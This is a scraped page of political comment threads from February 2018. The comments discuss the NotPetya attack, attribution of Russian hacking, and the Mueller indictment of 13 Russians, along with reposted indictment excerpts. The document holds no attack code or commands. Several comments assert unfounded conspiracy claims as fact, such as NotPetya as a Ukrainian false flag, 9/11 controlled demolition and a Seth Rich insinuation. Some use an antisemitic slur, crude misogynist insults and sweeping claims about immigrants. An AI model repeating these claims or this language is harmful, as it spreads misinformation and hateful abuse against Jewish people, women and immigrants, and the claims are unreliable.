But this campaign using NotPetya had the value of being a Tactic #1 attack + #2 failure against Russia. The CIA got to blame Russia even though the intended damage was quickly reversed by Kaspersky. The irony is they attacked a nation with the best resources to combat and defend against the weapon they used.

But make no mistake, the CyperWars are well underway. The US is sloppy, just like all their Hegemon efforts are seriously flawed in classic terms of execution. The Russians are far more elegant with cyber, as anyone who knows their software experts or products over the years.

Partisan , Feb 16, 2018 7:01:48 AM | 8
"But make no mistake, the CyperWars are well underway."

I doubt, I doubt very much. If there is a one than it is manufactured.

No vital and nationally sensitive or strategic IT nodes are exposed to the public net. All this is bizarre and narrative created by the Deep State for idiots. Probably ~60% of drugs infested Amerikkans do no care. The rest: https://medium.com/incerto/the-intellectual-yet-idiot-13211e2d0577 are somewhat interested. We can argue whether for domestic (in the light of another shooting, if true) or international purposes (Syria, Iraq, Iran), or both.

Partisan , Feb 16, 2018 7:14:33 AM | 9
The Class War is the Marx's term that is taboo and forbidden in capitalist's world everywhere and in particular in the US where is social oppression and inequality is the greatest in the world by far.

Maintain all kind of spins and propaganda along with political oppression i.e. help of political police the American version of the Nazi's Gestapo is crucial for the ruling class and regime.

While the looting of the drugged and non-drugged Americans continue unabated.

Partisan , Feb 16, 2018 7:33:59 AM | 10
I would say that only 10% of the Amerikkans have clue what's hacking about, and very small percentage understand in technical terms and details. Sadly, it is NOT important and even more important those question should not be asked! Questioning the highest authority is no, no. The more convoluted the better.

Now when the statement is out of the WH we might except refined follow up by the National Security organs, TNYT, TWP, etc. An intended audience are https://en.wikipedia.org/wiki/Little_Eichmanns

It is very good that you posted that photo of Collin Powell in the context of the article. It says it a lot, if not all.

integer , Feb 16, 2018 8:02:09 AM | 11
In a Euromaidan Press article dated November 2nd, 2016, the hackers state enthusiastically "Ukrainian hackers have a rather high level of work. So the help of the USA I don't know, why would we need it? We have all the talent and special means for this. And I don't think that the USA or any NATO country would make such sharp movements in international politics."

From: Untying PropOrNot: Who They Are and a Look at 2017's Biggest Fake News Story

Christian Chuba , Feb 16, 2018 8:15:13 AM | 12
On the Tucker Carlson Show an FBI agent defended the fact that they could not identify the school shooter, prior to the event, even after he was reported, because his one post did not identify himself explicitly. Also, the threat was not enough to open an investigation.

So now the same group of people claim the ability to discover that people are 'Russian Trolls' from a specific building in St. Petersburg simply based on the content of purely political posts to facebook and twitter.

Partisan , Feb 16, 2018 8:23:03 AM | 13
By following, little bit, the US National Security operation called Cryptocurrency (ies), allegedly based in South Korea and Japan I noticed numbers of hacking of the companies' web sites that are in this, let-call-it-business.

The most famous hacking was one of Mt.Gox (Japan based) one, where the French nationals was the business' principal. A money never was recovered, and hacker is still unknown!? I guess the place of business and the CEO meant (all US' client states) to give legitimacy to cryptocurrency and lure fools into buying the "fog". But where did "investors" money goes? Not to brilliant Russians...and how could that be? There is a lot of money in game, real money.

Is the National Security State agencies has transfered looting from the domestic soil to international one with help of the virtual reality. No trace of hackers, none!?

Partisan , Feb 16, 2018 9:06:43 AM | 14
I use the term The US National Security State (or Deep State) and its apparatus as synonymous to the Nazi Reich Main Security Office. Both of them, while differ in the methods and size, the goals and objectives are the same.
integer , Feb 16, 2018 9:12:50 AM | 15
Having just had a quick look into the NotPetya attack, it appears to have began on the morning of the day before Ukraine's Constitution Day, and originated from the update server of a Ukrainian tax accounting program called MeDoc. I expect this was another Ukrainian false flag; a cyber warfare version of MH17. Sharp movements in international politics indeed.
Partisan , Feb 16, 2018 9:23:02 AM | 16
integer | Feb 16, 2018 9:12:50 AM | 15

Meaning what? A client state was forced into this in order (to blame Russkies) to get another tranches of loan from the IMF?

susetta , Feb 16, 2018 9:53:35 AM | 17
Well that may mean that, under the new dictact (now the Unites States will not just use its nuclear weapons as a response if the other party used them; now the United States has declared that it will use nuclear weapons if, say, there should be a virus attack on its networks), that the United States is about to declare war on Russia and proceed to nuke it.
AriusArmenian , Feb 16, 2018 11:59:07 AM | 20
"We can only hope that these new accusations will have less severe consequences."

The russophobic fake news push is not letting up and now the Trump administration has jumped on board. And on top of targeting Iran has also ramped up targeting China.

This is how the last Cold War ramped up. The public was softened up by the media to fear the USSR. It's a symptom of a disease in its psyche spreading throughout the West.

We see through this nonsense but I fear we underestimate the danger. This Cold War v2 is already much hotter then v1. The West is approaching the throat of the East (Russia, China, Iran, and others), and unfortunately for the world the West feels (it has limited capability to think) it must prevail over the East or faces extinction. And what does that suggest might happen?

Petri Krohn , Feb 16, 2018 12:01:35 PM | 21
CrowdStrike said Russians known as Fancy Bear hacked the DNC. U.S. Department of Homeland Security identified one of the "Russian" malware tools used and named it "Grizzly Steppe" or "PAS tool PHP web kit". Later it was also found to attack U.S. power utilities.

I tracked down the creator of the malware and found out that he was a 23-year old Ukrainian university student at the Poltava National Technical University.

Did a Ukrainian University Student Create Grizzly Steppe?

3) The profexer site presents a SSL certificate that identifies it as pro-os.ru and gives an email address...

Almost a year later the New York Times reported the same story, but did not name the Ukrainian hacker.

In Ukraine, a Malware Expert Who Could Blow the Whistle on Russian Hacking

But while Profexer's online persona vanished, a flesh-and-blood person has emerged: a fearful man who the Ukrainian police said turned himself in early this year, and has now become a witness for the F.B.I.

Mr. Gerashchenko described the author only in broad strokes, to protect his safety, as a young man from a provincial Ukrainian city. He confirmed that the author turned himself in to the police and was cooperating as a witness in the D.N.C. investigation. "He was a freelancer and now he is a valuable witness," Mr. Gerashchenko said.

"Fancy Bear" is not the Russian military intelligence agency GRU or any other Russian government agency. It is simply a collection of hacking tools available online on Runet , the Russian language part of the Internet and the Russian language darknet.

james , Feb 16, 2018 12:04:41 PM | 22
thanks b.. more of the same bullshit.. "The U.S. is simply asserting this while presenting nothing to back it up."

from b's post - "In 2009 Russia offered an international treaty to prohibit cyber attacks. It was the U.S. under Obama which rejected it as "unnecessary" while it was expanding its own attack capabilities."

this from the link in the above quote..

"The United States argues that a treaty is unnecessary. It instead advocates improved cooperation among international law-enforcement groups. If these groups cooperate to make cyberspace more secure against criminal intrusions, their work will also make cyberspace more secure against military campaigns, American officials say."

5 eyes is doing such a great job of being like some stupid chorus line in a bad movie... all of them are beholden to the usa and the usa, as noted above - doesn't need any proof... what does that say about the usa?

willful blindness...

Shakesvshav , Feb 16, 2018 12:13:40 PM | 24
A small cause for celebration here in the UK: https://www.hackread.com/british-hacker-lauri-love-will-not-be-extradited-to-usa/
james , Feb 16, 2018 12:18:58 PM | 25
@24 shakesvshav - it's a good thing they weren't caught up in some allegation based in sweden which the swedes wanted to drop, but the uk/usa discouraged them from doing... i am thinking of julian assange here - stuck in the eqaudor embassy in the uk.. craig murray did a couple of articles on this the past few days which kind of makes one want to puke especially if one lives in the uk...

nice to see an opportunity for celebration come your way!

https://www.craigmurray.org.uk/

J Swift , Feb 16, 2018 12:22:15 PM | 26
@integer 15 " I expect this was another Ukrainian false flag; a cyber warfare version of MH17"

Not as crazy as it sounds. Hell, the CIA and SBU literally share a building! And this code apparently does not have the hallmark elegance of Russian hackers. Why not get a good swipe at Russian businesses, while destroying enough data (evidence) in Ukraine to cover a multitude of sins (just like at least one of the ammo dump explosions is strongly suspected as having been intentionally set to cover up missing inventory which now no doubt resides in Syria). And then the icing on the cake is to get to blame Russia and try to bolster rapidly failing support for sanctions. A lot more plausible than a half-baked Russian attack.

[Feb 16, 2018] Mueller Indicts 13 Russians For Interfering In US Election

False flag or real ?
Is not "included supporting the presidential campaign of then-candidate Donald J. Trump ("Trump Campaign") and disparaging Hillary Clinton . " (or vise versa) by posting on social media an example of free speech ?
But usage of fake identities clearly is not: "The Russians tracked the metrics of their effort in reports and budgeted for their efforts. Some, as described below, traveled to the U.S. to gather intelligence for the surreptitious campaign. They used stolen U.S. identities, including fake driver's licenses, and contacted news media outlets to promote their activities."
The question is how those unquestionable very talented Russians managed to learn English language without living in the USA and operate such a sophisticated operation from oversees? English is a very difficult language for Russians to master and Russian immigrants who came to the USA being older then 16 and living in the USA for ten or twenty years typically still have horrible accent and bad or very bad grammar (tenses, "a" and "the" usage, you name it). Actually Russian woman are noticeably better then men in this area, especially if they are married to a US spouse. Ass to this dismal understanding of the USA politics including differences between Democratic and Republican parties (you probably need to live in the USA for ten years to start appreciate those differences ;-) . How they managed to learn local political culture to be effective? That's a strong argument in favor of false flag operation -- in case they have puppeteers from the USA everything is more or less rationally explainable.
Notable quotes:
"... It gets better: the defendants reportedly worked day and night shifts to pump out messages, controlling pages targeting a range of issues, including immigration, Black Lives Matter, and they amassed hundreds of thousands of followers. They set up and used servers inside the U.S. to mask the Russian origin of the accounts. ..."
"... The Russian organization named in the indictment - the Internet Research Agency - and the defendants began working in 2014 - so one year before the Trump candidacy was even announced - to interfere in U.S. elections, according to the indictment in Washington. They used false personas and social media while also staging political rallies and communicating with "unwitting individuals" associated with the Trump campaign, it said. ..."
"... The Russians tracked the metrics of their effort in reports and budgeted for their efforts. Some, as described below, traveled to the U.S. to gather intelligence for the surreptitious campaign. They used stolen U.S. identities, including fake driver's licenses, and contacted news media outlets to promote their activities. ..."
"... Defendant ORGANIZATION had a strategic goal to sow discord in the U.S. political system, including the 2016 U.S. presidential election. Defendants posted derogatory information about a number of candidates, and by early to mid-2016, Defendants' operations included supporting the presidential campaign of then-candidate Donald J. Trump ("Trump Campaign") and disparaging Hillary Clinton . ..."
"... Defendants, posing as U.S. persons and creating false U.S. personas, operated social media pages and groups designed to attract U.S. audiences. These groups and pages, which addressed divisive U.S. political and social issues, falsely claimed to be controlled by U.S. activists when, in fact, they were controlled by Defendants. Defendants also used the stolen identities of real U.S. persons to post on ORGANIZATION-controlled social media accounts. Over time, these social media accounts became Defendants' means to reach significant numbers of Americans for purposes of interfering with the U.S. political system, including the presidential election of 2016 ..."
"... Sixteen thousand Facebook users said that they planned to attend a Trump protest on Nov. 12, 2016, organized by the Facebook page for BlackMattersUS, a Russian-linked group that sought to capitalize on racial tensions between black and white Americans. The event was shared with 61,000 users. ..."
"... As many as 5,000 to 10,000 protesters actually convened at Manhattan's Union Square. They then marched to Trump Tower, according to media reports at the time . ..."
"... 13 Russians can influence US elections meanwhile US CIA and State Department spend $1 BIllion every year on opposition groups inside Russia without success. ..."
"... Indict AIPAC. That is the real foreign interference in ALL US elections. Such hypocrisy. At the very least, make them register as a foreign operation! Information warfare using social media ? What, you mean like the Israeli students who are paid to shape public opinion thru social media? This is no secret and has been in the news. I fail to find the difference? Psychologists call this projection, that is where you accuse others of the crimes you commit . ..."
"... It looks like Mueller would have these people for identity theft if he had them in the US, which he probably doesn't. ..."
"... Deep state pivot to keep the Russian hate alive. ..."
"... Fucking hilarious - Mueller has indicted an anti-Russian CIA operation that was run out of St. Petersburg. http://thesaker.is/a-brief-history-of-the-kremlin-trolls/ ..."
"... The bigger question is "when is Mueller going to be indicted for covering up the controlled demolition of the WTC buildings on nine eleven??" ..."
Feb 16, 2018 | www.zerohedge.com

Mueller charges "defendants knowingly and intentionally conspired with each other (and with persons known and unknown to the Grand Jury) to defraud the United States by impairing, obstructing, and defeating the lawful functions of the government through fraud and deceit for the purpose of interfering with the U.S. political and electoral processes, including the presidential election of 2016."

The indictment adds that the Russians " were instructed to post content that focused on 'politics in the USA' and to 'use any opportunity to criticize Hillary and the rest (except Sanders and Trump -- we support them)' ."

It gets better: the defendants reportedly worked day and night shifts to pump out messages, controlling pages targeting a range of issues, including immigration, Black Lives Matter, and they amassed hundreds of thousands of followers. They set up and used servers inside the U.S. to mask the Russian origin of the accounts.

Ultimately, and this is the punchline, the goal was to disparage Hillary Clinton and to assist the election of Donald Trump.

In other words, anyone who was disparaging Clinton, may have "unwittingly" been a collaborator of the 13 Russian "specialists" who cost Hillary the election.

The Russian organization named in the indictment - the Internet Research Agency - and the defendants began working in 2014 - so one year before the Trump candidacy was even announced - to interfere in U.S. elections, according to the indictment in Washington. They used false personas and social media while also staging political rallies and communicating with "unwitting individuals" associated with the Trump campaign, it said.

The Russians "had a strategic goal to sow discord in the U.S. political system," according to the indictment in Washington.

The Russians also reportedly bought advertisements on U.S. social media, created numerous Twitter accounts designed to appear as if they were U.S. groups or people, according to the indictment. One fake account, @TEN_GOP account, attracted more than 100,000 online followers.

The Russians tracked the metrics of their effort in reports and budgeted for their efforts. Some, as described below, traveled to the U.S. to gather intelligence for the surreptitious campaign. They used stolen U.S. identities, including fake driver's licenses, and contacted news media outlets to promote their activities.

The full list of named defendants in addition to the Internet Research Agency, as well as Concord Management and Consulting and Concord Catering, include:

Mueller's office said that none of the defendants was in custody.

So how is Trump involved? Well, he isn't, as it now seems that collusion narrative is dead, and instead Russian involvement was unilateral. Instead, according to the indictment, the Russian operations were unsolicited and pro bono, and included " supporting Trump... and disparaging Hillary Clinton,' staging political rallies, buying political advertising while posing as grassroots U.S. groups. Oh, and communicating " with unwitting individuals associated with the Trump Campaign and with other political activists to seek to coordinate political activities. "

Defendant ORGANIZATION had a strategic goal to sow discord in the U.S. political system, including the 2016 U.S. presidential election. Defendants posted derogatory information about a number of candidates, and by early to mid-2016, Defendants' operations included supporting the presidential campaign of then-candidate Donald J. Trump ("Trump Campaign") and disparaging Hillary Clinton .

Defendants made various expenditures to carry out those activities, including buying political advertisements on social media in the names of U.S. persons and entities. Defendants also staged political rallies inside the United States, and while posing as U.S. grassroots entities and U.S. persons, and without revealing their Russian identities and ORGANIZATION affiliation, solicited and compensated real U.S. persons to promote or disparage candidates. Some Defendants, posing as U.S. persons and without revealing their Russian association, communicated with unwitting individuals associated with the Trump Campaign and with other political activists to seek to coordinate political activities.

Furthermore, the dastardly Russians created fake accounts to pretend they are Americans:

Defendants, posing as U.S. persons and creating false U.S. personas, operated social media pages and groups designed to attract U.S. audiences. These groups and pages, which addressed divisive U.S. political and social issues, falsely claimed to be controlled by U.S. activists when, in fact, they were controlled by Defendants. Defendants also used the stolen identities of real U.S. persons to post on ORGANIZATION-controlled social media accounts. Over time, these social media accounts became Defendants' means to reach significant numbers of Americans for purposes of interfering with the U.S. political system, including the presidential election of 2016

Mueller also alleges a combination of traditional and modern espionage...

Certain Defendants traveled to the United States under false pretenses for the purpose of collecting intelligence to inform Defendants' operations. Defendants also procured and used computer infrastructure, based partly in the United States, to hide the Russian origin of their activities and to avoid detection by U.S. regulators and law enforcement.

Mueller also charges that two of the defendants received US visas and from approximately June 4, 2014 through June 26, 2014, KRYLOVA and BOGACHEVA " traveled in and around the United States, including stops in Nevada, California, New Mexico, Colorado, Illinois, Michigan, Louisiana, Texas, and New York to gather intelligence, After the trip, KRYLOVA and BURCHIK exchanged an intelligence report regarding the trip."

* * *

The indictment points to a broader conspiracy beyond the pages of the indictment, saying the grand jury has heard about other people with whom the Russians allegedly conspired in their efforts.


Joe Davola -> Pandelis Fri, 02/16/2018 - 13:02 Permalink

Concord Catering - what, were they offering chicken wings and pigs ears at the polling places?

Never One Roach -> Joe Davola Fri, 02/16/2018 - 13:03 Permalink

So how often does Mueller hear those demon voices in his head?

Billy the Poet -> Never One Roach Fri, 02/16/2018 - 13:05 Permalink

I wonder if any of these Russians were behind the anti-Trump rallies of November 2016? Thousands attended protest organized by Russians on Facebook.

Thousands of Americans attended a march last November organized by a Russian group that used social media to interfere in the 2016 election.

The demonstration in New York City, which took place a few days after the election, appears to be the largest and most successful known effort to date pulled off by Russian-linked groups intent on using social media platforms to influence American politics.

Sixteen thousand Facebook users said that they planned to attend a Trump protest on Nov. 12, 2016, organized by the Facebook page for BlackMattersUS, a Russian-linked group that sought to capitalize on racial tensions between black and white Americans. The event was shared with 61,000 users.

As many as 5,000 to 10,000 protesters actually convened at Manhattan's Union Square. They then marched to Trump Tower, according to media reports at the time .

The BlackMattersUS-organized rally took advantage of outrage among groups on the left following President Trump's victory on Nov. 8 to galvanize support for its event. The group's protest was the fourth consecutive anti-Trump rally in New York following election night, and one of many across the country.

"Join us in the streets! Stop Trump and his bigoted agenda!" reads the Facebook event page for the rally. "Divided is the reason we just fell. We must unite despite our differences to stop HATE from ruling the land."

http://thehill.com/policy/technology/358025-thousands-attended-protest-

Belrev -> Billy the Poet Fri, 02/16/2018 - 13:07 Permalink

13 Russians can influence US elections meanwhile US CIA and State Department spend $1 BIllion every year on opposition groups inside Russia without success.

SamAdams -> Belrev Fri, 02/16/2018 - 13:08 Permalink

Indict AIPAC. That is the real foreign interference in ALL US elections. Such hypocrisy. At the very least, make them register as a foreign operation! Information warfare using social media ? What, you mean like the Israeli students who are paid to shape public opinion thru social media? This is no secret and has been in the news. I fail to find the difference? Psychologists call this projection, that is where you accuse others of the crimes you commit .

Belrev -> SamAdams Fri, 02/16/2018 - 13:10 Permalink

That is a regime change in DC proposition.

IH8OBAMA -> Belrev Fri, 02/16/2018 - 13:21 Permalink

If Mueller is going outside the Trump organization to indict Russians, when is he going to indict some equally criminal Democraps?

I also see that one of the 13 Russians was Valdimir. ( VLADIMIR VENKOV ) LOL

Shillinlikeavillan -> IH8OBAMA Fri, 02/16/2018 - 13:24 Permalink

Soooooooo...

They basically indicted the $100,000 facebook ad russian group... Bravo! Ur really on the path to impeaching trump now!
LULZ!

overbet -> Shillinlikeavillan Fri, 02/16/2018 - 13:34 Permalink

Boy Hillary sure didnt get her money's worth. She shoulda hired these people.

Is it ok for MSM for to make all of their disparaging commentary, but not ok for people to do the same? Mueller mustve forgot about the craigslist ads hiring protesters to attack Trump rallies. What a fucking clown show.

I guess that's it Mueller gets his indictments to save face and Trump is pleased its over.

El Vaquero -> overbet Fri, 02/16/2018 - 13:44 Permalink

This ties directly into the October 31, 2017 testimony from Facebook, Twitter and Google regarding Russian media presence on social media. Mueller is grasping here, and given that it talks about visas granted for short visits, I'm led to believe that most of these people are actually not on US soil to be arrested. This means political grandstanding via an indictment that is never going to see a courtroom where the evidence can be examined and witnesses can be cross examined. It looks like Mueller would have these people for identity theft if he had them in the US, which he probably doesn't.

I'm going to get called a Russian bot over this elsewhere. Well, maybe facetiously here. #WeAreAllRussianBotsNow

spanish inquisition -> El Vaquero Fri, 02/16/2018 - 13:56 Permalink

Deep state pivot to keep the Russian hate alive.

FoggyWorld -> spanish inquisition Fri, 02/16/2018 - 13:59 Permalink

And set us up for war.

Shemp 4 Victory -> FoggyWorld Fri, 02/16/2018 - 14:10 Permalink

Fucking hilarious - Mueller has indicted an anti-Russian CIA operation that was run out of St. Petersburg. http://thesaker.is/a-brief-history-of-the-kremlin-trolls/

pods -> Shemp 4 Victory Fri, 02/16/2018 - 14:22 Permalink

Wow, I am going to have to keep the radio off for a couple of days. They are going to be wall to wall on this. Maybe even bump the stories where fakely sympathetic reporter cunts (FSRC) ask mother's if they miss their dead kids.

This is a fucking clownshow anymore. Jesus, THIS is what the investigation brought home? Holy fuckshit, this is a joke. Some guy had 100k followers? Really? Like anyone GAF about that? We have AIPAC making candidates kneel before them and yet some guys on Tweeter fucked around. I think that is even bullshit. If Russians really did that, they wouldn't "work in shifts" they would program some fucking bots to do this.

I can just imagine the fake outrage that that worthless kike from NY Chuckie "don't get between me and a camera" Schumer has to say about this.

This is a Matrix alright, and a cheap ass one at that.

Mueller should be taken out and horsewhipped for bringing this shit home.

Hey Mueller, I read a comment on Yahoo news that was in broken English. Go get um!

pods

stizazz -> pods Fri, 02/16/2018 - 14:30 Permalink

They HATE Russia because PUTIN OPENLY derided the American Empire.

BennyBoy -> pods Fri, 02/16/2018 - 14:38 Permalink

The Russians duped me.

I was gonna vote for Hillary then I read tweets where she bullied the woman her husband raped to keep quiet. And how her foundation got hundreds of $millions from countries with business before her at the state dept. ALEKSANDRA YURYEVNA KRYLOVA mislead me.

BennyBoy -> BennyBoy Fri, 02/16/2018 - 14:42 Permalink

Its probably nothing....

CHINESE STATE-OWNED CHEMICAL FIRM JOINS DARK MONEY GROUP POURING CASH INTO U.S. ELECTIONS

Lee Fang February 15 2018, 10:10 a.m.

WANHUA CHEMICAL, A $10 billion chemical company controlled by the Chinese government, now has an avenue to influence American elections.

On Monday, Wanhua joined the American Chemistry Council, a lobby organization for chemical manufacturers that is unusually aggressive in intervening in U.S. politics.

The ACC is a prominent recipient of so-called dark money -- that is, unlimited amounts of cash from corporations or individuals the origins of which are only disclosed to the IRS, not the public. During the 2012 , 2014 , and 2016 election cycles, the ACC took this dark money and spent over $40 million of it on contributions to super PACs, lobbying, and direct expenditures. (Additional money flowed directly to candidates via the ACC's political action committee.).....

https://theintercept.com/2018/02/15/chinese-state-owned-chemical-firm-j

ThanksChump -> BennyBoy Fri, 02/16/2018 - 14:50 Permalink

Duped by facts and truth is no way to go through life, son.

JimmyJones -> ThanksChump Fri, 02/16/2018 - 15:59 Permalink

Obama, "I can do more after I'm reelected" to Putin caught on a hot mic.

I always knew Hillary was as pure as the first winter's snow.

Theosebes Goodfellow -> pods Fri, 02/16/2018 - 14:42 Permalink

~" In other words, anyone who was disparaging Clinton, may have "unwittingly" been a collaborator of the 13 Russian "specialists" who cost Hillary the election. "~

Wait, does this mean that "disparaging Hillary" was just for the witless? I've been doing that for years, (without any Russian influence at all), and have found it to be rather witty virtually all the time.

Can we NOW get to the point where we appoint a special prosecutor to investigate Hillary?

rwe2late -> Theosebes Goodfellow Fri, 02/16/2018 - 15:09 Permalink

not yet ...

any of us who spread "fake news" are now "conspirators" who gave "support" to foreign agents with the goal of undermining the "democratic process" by denying Hillary the presidency.

tsk, tsk.

ignorance can be no excuse for such wanton lawlessness.

rwe2late -> rwe2late Fri, 02/16/2018 - 15:36 Permalink

oh, oh

I almost forgot. "conspirators" were blatantly "sowing discord" obvious "proof" of "cooperating" with the Russians

Boxed Merlot -> rwe2late Fri, 02/16/2018 - 15:46 Permalink

..."conspirators" were blatantly "sowing discord"...

Yep, so on top of being "Deplorable", I'm also without wit.

His name was Seth.

Squid Viscous -> pods Fri, 02/16/2018 - 14:57 Permalink

well said pods, i wish i could upvote you like, 13 times

Machbet -> pods Fri, 02/16/2018 - 15:32 Permalink

Well said, my brother. "A fucking clownshow..." A clownshow run by juvenile, idiotic fallen angels.

sixsigma cygnu -> spanish inquisition Fri, 02/16/2018 - 14:01 Permalink

I'm just relieved they didn't get Boris. Not this time.

Telling people the truth makes one a very desirable target.

BigCumulusClouds -> sixsigma cygnu Fri, 02/16/2018 - 14:06 Permalink

The bigger question is "when is Mueller going to be indicted for covering up the controlled demolition of the WTC buildings on nine eleven??"

eatthebanksters -> spanish inquisition Fri, 02/16/2018 - 14:10 Permalink

So this is all they have?

Bubba Rum Das -> Citizen in 1984 Fri, 02/16/2018 - 16:08 Permalink

Yes, Mueller is a clown show, but he came up w/ this crap in an attempt to divert media attention away from his & McCabes direct involvement in trying to cover up Uranium 1 for Hillary...The Truth!

Boxed Merlot -> eatthebanksters Fri, 02/16/2018 - 15:48 Permalink

...all they have?...

Sure hope they weren't bettin' the farm.

jmo.

DosZap -> El Vaquero Fri, 02/16/2018 - 15:05 Permalink

He has to INDICT someone,since he can't get Trump except on adultery.(the only thing NOT under his purview)

I see a distant MELANIA in his near future.

eclectic syncretist -> DosZap Fri, 02/16/2018 - 15:43 Permalink

The FBI going DEEP (#sarc) into its playbook for this one.

Simultaneously distracting from their incompetencies with regards to domestic threats (school shooters/government collusion to subvert presidential election), and exonerating Hillary AGAIN.

"Using lies and deception to cover our lies and deceptions, so that we can enslave the populace to our will" (visualize Meuller/Comey/Strzok/Page/Ohr/Rosenstein/Obama/Rice/ with left hands on Satanic Bible and right arms extended giving oath in Temple of Mammon before upside down American flag).

ebear -> El Vaquero Fri, 02/16/2018 - 15:17 Permalink

"#WeAreAllRussianBotsNow"

Ich bin ein Russe!

agNau -> overbet Fri, 02/16/2018 - 13:59 Permalink

Hillary hired the entire Russian government with the Uranium one deal.

BigCumulusClouds -> overbet Fri, 02/16/2018 - 14:04 Permalink

Protestors?? HRC hired thugs who beat people up at Trump rallies. That's a felony. Some people got hurt real bad.

IH8OBAMA -> Shillinlikeavillan Fri, 02/16/2018 - 13:37 Permalink

I wonder if Mueller is going to indict Obama for interfering in the Israeli election?

giovanni_f -> IH8OBAMA Fri, 02/16/2018 - 13:56 Permalink

1. CNN can now say Russian interference is a "proven fact".

2. "13 individuals" and "3 companies" - this is a casus belli even for the most pacifist peaceniks on ZH

3. US can now continue to meddle in Russian elections as they did since 1919 pointing to the existential thread those 13 individuals posed.

rwe2late -> giovanni_f Fri, 02/16/2018 - 15:46 Permalink

worse than 3.meddling in Russian elections,

anyone who objects to US military and economic aggression,

will be further branded/dismissed (prosecuted?)

as a "proven dupe" of Russia/Putin.

caconhma -> IH8OBAMA Fri, 02/16/2018 - 14:08 Permalink

The US Constitution. RIP

The DoJ and Miller activities are anti-American. What else is new in occupied America?

PS

Note Trump does nothing about this unprecedented assault on Freedom of Speech and Assembly in the USA. Therefore, Trump is a willing player in these criminal activities.

commiebastid -> IH8OBAMA Fri, 02/16/2018 - 14:21 Permalink

and Brexit and the French election and Venezuela election and The Ukraine; Libya; Palestinian Territories..... lmao

DownWithYogaPants -> Shillinlikeavillan Fri, 02/16/2018 - 13:44 Permalink

Ohhh fake social accounts.........the horror!

( If I had known they were the equivalent of Harry Potters magic wand I would have opened a few long ago! )

Seems like Mr Mueller is in face saving mode.

What is Rod Rosenstein doing still at the FBI. He should be in prison.

MEFOBILLS -> Shillinlikeavillan Fri, 02/16/2018 - 14:50 Permalink

Mueller is going to go until he gets some meat. Maybe this lean and stringy meat is enough to satisfy. Of course, nobody will look at AIPAC and all of the foreign influence money funneling into senators coffers.

Endgame Napoleon -> carni Fri, 02/16/2018 - 14:26 Permalink

He said they stole identities, posting anti-Hillary remarks on Russian-controlled sites, using the stolen identities. They must do that through hacking, which is illegal.

They also organized rallies, he said. There were ads on job sites, advertising for paid [leftist] protestors, long before Trump emerged as a candidate. People posted them on American sites. Some attribute it to Soros. I am a little skeptical that Soros controls the world, anymore than Russians, but that is what people often believe, when it is leftist ads.

Advertisements are all over the Internet. Is that illegal? He called it fraud, referring to the misrepresentation of identity, I guess. They should not be manipulating unknowing people.

But, I wonder if he has the same vigilance when illegal aliens use fake SS cards to acquire jobs, while their girlfriends use real SS cards of US-born kids to get $450 on average in EBT food assistance, in addition to other welfare, making it easy for illegal aliens to undercut American citizens in jobs. Using a fake SS number -- i.e. posing as an American to get a job -- is fraud.

As long as the illegal aliens have sex after illegal border crossings, reproduce and say they misrepresent their identities for the good of their kids, this is legal and deserving of pay-per-birth welfare / child-tax-credit freebies and citizenship, whereas these Russians are committing fraud.

They should not be doing that in either case, but the double standard is interesting.

And if people cannot post freely on the internet without revealing their real names, a lot of internet activity (and a lot of related commerce) will cease. Many people post anonymously, often due to jobs or other factors that have nothing to do with elections.

In fact, FBI agents post under identities (personas) that are not their own. There are many articles, describing how police agencies use fake identities on the internet to track down criminals, including those who abuse children. They do the same thing to monitor terrorists; they use fake identities.

[Feb 16, 2018] Where are these indictments ? Obama, Hillary Clinton, Victoria Nuland, Geoffrey Pyatt and John McCain.

Feb 16, 2018 | www.zerohedge.com

Vote up! 2 Vote down! 0

Mike Masr Fri, 02/16/2018 - 15:41 Permalink

Where are these indictments ? Obama, Hillary Clinton, Victoria Nuland, Geoffrey Pyatt and John McCain.

The US has been meddling and interfering in other countries elections and internal affairs for decades. Not only does the US meddle and interfere in other countries elections it overthrows democratically elected governments it simply doesn't like, and then installs its own puppet leaders. Our deep-state MIC owned neocons casually refer to this as "regime change".

I can only imagine the hell that would break loose if Russia fomented, paid for, and assisted in a violent overthrow of the legitimately and democratically elected government in Mexico. Imagine Russian spymasters working from the Russian Embassy in Mexico City training radicals how to use social media to bring out angry people and foment violent pubic unrest. Then Russian Duma members in Mexico City handing out tacos, and tamales emboldening and urging these angry people to riot, and overthrow the government and toss the bums out. Then Putin's executive group hand picking all the new (anti-USA) drug cartel junta puppet leaders and an old senile Russian senator in Mexico City stating at a podium on RT, there are no drug cartels here, that's all propaganda!

On the other side of the world Obama's neocon warmongers spent billions doing exactly this. Instead of drug cartels it was Banderist Neo-Nazis. Obama and our neocons, including John McCain intentionally caused all of this fucking mess, civil war and horrific death in Ukraine on Russia's border and then placed the blame on Putin and Russia.

Thanks to John McCain and our evil fucking neocons - the regime change policy implemented by Obama, Clinton and Nuland's minions, like Geoffrey Pyatt, the Ukraine today is totally fucked. It is now a corrupt banana republic embroiled in a bloody civil war. For the US and NATO the golden prize of this violent undemocratic regime change was supposed to be the Crimea. This scheme did not play out as intended. No matter what sanctions the warmongering neocons place on Russia they will NEVER give back the Crimea!

Our neocon fuck heads spent billions of our hard earned taxpayer dollars to create pain, suffering, death and a civil war in Ukraine on the border with Russia.

This is a case of don't do what we do, only do what we tell you to do. It's perfectly okay when we meddle. We don't like it when we think it may have been done to us. It's hypocrisy and duplicity at its finest!

Tech Camp NGO - operating out of US Embassy in Kiev

(using social media to help bring out radicals-and cause civil war-pre Maidan 2013)

https://www.youtube.com/watch?v=y9hOl8TuBUM

Nuland talks about $5 billion spent on Ukraine

https://www.youtube.com/watch?v=eaR1_an9CnQ

Nuland plotting(on intercepted phone call) the new handpicked puppet leaders.

https://www.youtube.com/watch?v=CL_GShyGv3o

US Support of Banderist Neo-Nazis in Ukraine 2014

https://www.youtube.com/watch?v=8-RyOaFwcEw

Lavrov reminds the UN a West-inspired coup d'ιtat started Ukraine crisis, not Russia

https://www.rt.com/op-edge/404247-un-lavrov-ukraine-sanctions/

[Feb 16, 2018] What is the definition of a fake social media account ? What is the crime for operatine a fake social medial account? Is this the standard by which we will all be judged?

Feb 16, 2018 | www.zerohedge.com

Genby Fri, 02/16/2018 - 14:51 Permalink

Mueller effectively called himself an idiot and degenerate.

13 people won against the whole apparatus of FBI (including Mueller). That makes FBI a herd of idiots and degenerates (including Mueller).

SirBarksAlot -> rgraf Fri, 02/16/2018 - 16:44 Permalink

What crime?

Impersonating an American?

Practicing freedom of speech?

Trying to influence an election?

I don't see any crimes.

Joiningupthedots Fri, 02/16/2018 - 14:31 Permalink

